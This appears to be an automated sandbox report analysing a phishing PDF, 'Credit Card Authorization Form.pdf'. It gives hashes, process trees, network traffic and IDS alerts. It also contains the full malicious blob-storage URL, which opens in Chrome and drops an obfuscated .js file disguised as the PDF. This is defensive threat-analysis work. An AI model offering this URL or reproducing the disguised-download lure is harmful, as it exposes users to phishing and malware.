Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Credit Card Authorization Form.pdf

Overview

General Information

Sample name:Credit Card Authorization Form.pdf
Analysis ID:1577099
MD5:d42718aad08c2e4d04fad3c465e38b12
SHA1:39d1a490682830a77267ea8cd6614bb336bf2739
SHA256:18a0c02abbe3880010c2863e3d26791771ffd51a8fa8ce6bd895ebebfe02eb5b
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
Blob-based file download detected
Downloads suspicious files via Chrome
HTML page contains base64 encoded files
IP address seen in connection with other malware
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 6540 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Credit Card Authorization Form.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 5732 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6636 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1552,i,16749495978696567103,8341145372217453035,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • chrome.exe (PID: 7728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,927129136615329189,15538360311667193620,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1984,i,4601340424966888979,1320841207906655574,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T01:01:49.162341+010020264861Potential Corporate Privacy Violation192.168.2.16548631.1.1.153UDP
2024-12-18T01:01:49.162341+010020264861Potential Corporate Privacy Violation192.168.2.16513351.1.1.153UDP
2024-12-18T01:03:09.050770+010020264861Potential Corporate Privacy Violation192.168.2.16647661.1.1.153UDP
2024-12-18T01:03:09.051139+010020264861Potential Corporate Privacy Violation192.168.2.16587721.1.1.153UDP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://adobe.blob.core.windows.net/adobe/adobe.ht... The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It exhibits several high-risk indicators, including dynamic code execution through base64-encoded content, potential data exfiltration, and obfuscated code. The combination of these behaviors suggests a high likelihood of malicious intent, warranting a high-risk score.
Source: https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DHTTP Parser: Base64: UEsDBBQACAAIAEqnkVkA...AAEAWAAAAOsWAAAAAA== decoded: PK........J..Y.............f....+..h....4..
Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox ViewIP Address: 151.101.1.229 151.101.1.229
Source: Joe Sandbox ViewIP Address: 151.101.129.229 151.101.129.229
Source: Network trafficSuricata IDS: 2026486 - Severity 1 - ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service : 192.168.2.16:54863 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2026486 - Severity 1 - ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service : 192.168.2.16:51335 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2026486 - Severity 1 - ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service : 192.168.2.16:64766 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2026486 - Severity 1 - ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service : 192.168.2.16:58772 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://adobe.blob.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://adobe.blob.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/jszip/3.10.1/jszip.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chromecache_176.14.dr, chromecache_179.14.drString found in binary or memory: http://stuartk.com/jszip
Source: 2D85F72862B55C4EADD9E66E06947F3D0.3.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_180.14.drString found in binary or memory: https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js
Source: chromecache_180.14.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
Source: 87df5a63-4d58-4117-a9d9-fcbb6c1d3536.tmp.4.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: chromecache_176.14.dr, chromecache_179.14.drString found in binary or memory: https://github.com/nodeca/pako/blob/main/LICENSE
Source: chromecache_176.14.dr, chromecache_179.14.drString found in binary or memory: https://raw.github.com/Stuk/jszip/main/LICENSE.markdown.
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

System Summary

barindex
Source: C:\Users\user\Downloads\Credit Card Authorization Form.pdf.jsFile download: blob:https://adobe.blob.core.windows.net/0e6834e0-4a35-4d35-bc8e-44991bc53383
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\Credit Card Authorization Form.pdf.................................js (copy)Jump to dropped file
Source: classification engineClassification label: mal56.phis.winPDF@40/73@11/6
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-17 19-01-38-631.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Credit Card Authorization Form.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1552,i,16749495978696567103,8341145372217453035,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,927129136615329189,15538360311667193620,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1984,i,4601340424966888979,1320841207906655574,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1552,i,16749495978696567103,8341145372217453035,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,927129136615329189,15538360311667193620,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1984,i,4601340424966888979,1320841207906655574,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: Google Drive.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Credit Card Authorization Form.pdfInitial sample: PDF keyword /JS count = 0
Source: Credit Card Authorization Form.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577099 Sample: Credit Card Authorization F... Startdate: 18/12/2024 Architecture: WINDOWS Score: 56 27 x1.i.lencr.org 2->27 29 bg.microsoft.map.fastly.net 2->29 41 HTML page contains base64 encoded files 2->41 43 Blob-based file download detected 2->43 45 Downloads suspicious files via Chrome 2->45 47 AI detected suspicious Javascript 2->47 8 Acrobat.exe 18 76 2->8         started        signatures3 process4 process5 10 chrome.exe 23 8->10         started        14 AcroCEF.exe 74 8->14         started        16 chrome.exe 8->16         started        dnsIp6 37 192.168.2.16, 138, 443, 49696 unknown unknown 10->37 39 239.255.255.250 unknown Reserved 10->39 25 Credit Card Author.............js (copy), ASCII 10->25 dropped 18 chrome.exe 10->18         started        21 AcroCEF.exe 4 14->21         started        23 chrome.exe 16->23         started        file7 process8 dnsIp9 31 www.google.com 172.217.19.228, 443, 49727, 49738 GOOGLEUS United States 18->31 33 151.101.1.229, 443, 49729 FASTLYUS United States 18->33 35 3 other IPs or domains 18->35

